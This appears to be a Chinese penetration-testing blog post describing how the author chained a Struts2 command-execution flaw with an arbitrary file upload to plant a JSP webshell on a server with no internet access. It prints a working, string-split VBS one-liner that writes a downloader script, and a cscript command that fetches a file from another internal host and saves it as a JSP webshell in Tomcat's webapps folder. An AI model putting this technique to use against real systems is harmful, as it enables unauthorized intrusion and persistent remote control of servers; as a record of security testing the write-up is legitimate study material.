TIDE_网络安全网络安全万网极研社

漏洞组合又见getshell

2019-03-19  本文已影响180人  CSeroad

前言

在项目中拿到一个比较有意思的shell。在此记录一下。

struts漏洞

拿眼一打,struts2框架。工具尝试扫描,果然存在漏洞。

image.png

但是确无法使用该工具的上传功能。猜测应该是权限不够导致的。

文件上传

在登录系统后发现一处文件上传。

image.png

测试发现可进行任意文件上传。上传jsp马试试

image.png

emmm。好像没有配置java环境,且不在同一台服务器。
尝试上传txt文本文件

image.png

访问一下。

image.png
确定是jsp马。
现在条件是:无法连接外网、有文件上传漏洞、命令执行漏洞。
怎么拿shell呢?
思路:利用命令执行powershell或vbs从192.168.40.13的服务器下载到192.168.40.21(不知为何powershell没有成功)

vbs一句话下载payload

1.echo命令输出创建downfile.vbs文件。注意转义

echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2  >> downfile.vbs

2.downfile.vbs从192.168.40.13服务器下载文件到192.168.40.21服务器

cscript downfile.vbs http://192.168.40.13:9090/fileLibrary/5d5X9mSTZXjH9VlhXNN/x.txt D:\\tomcat8.5\\webapps\\x.jsp
image.png

下载的txt文件重命名为jsp一句话木马
ok!!!尝试访问

image.png

Nice!!!

image.png
上一篇 下一篇

猜你喜欢

热点阅读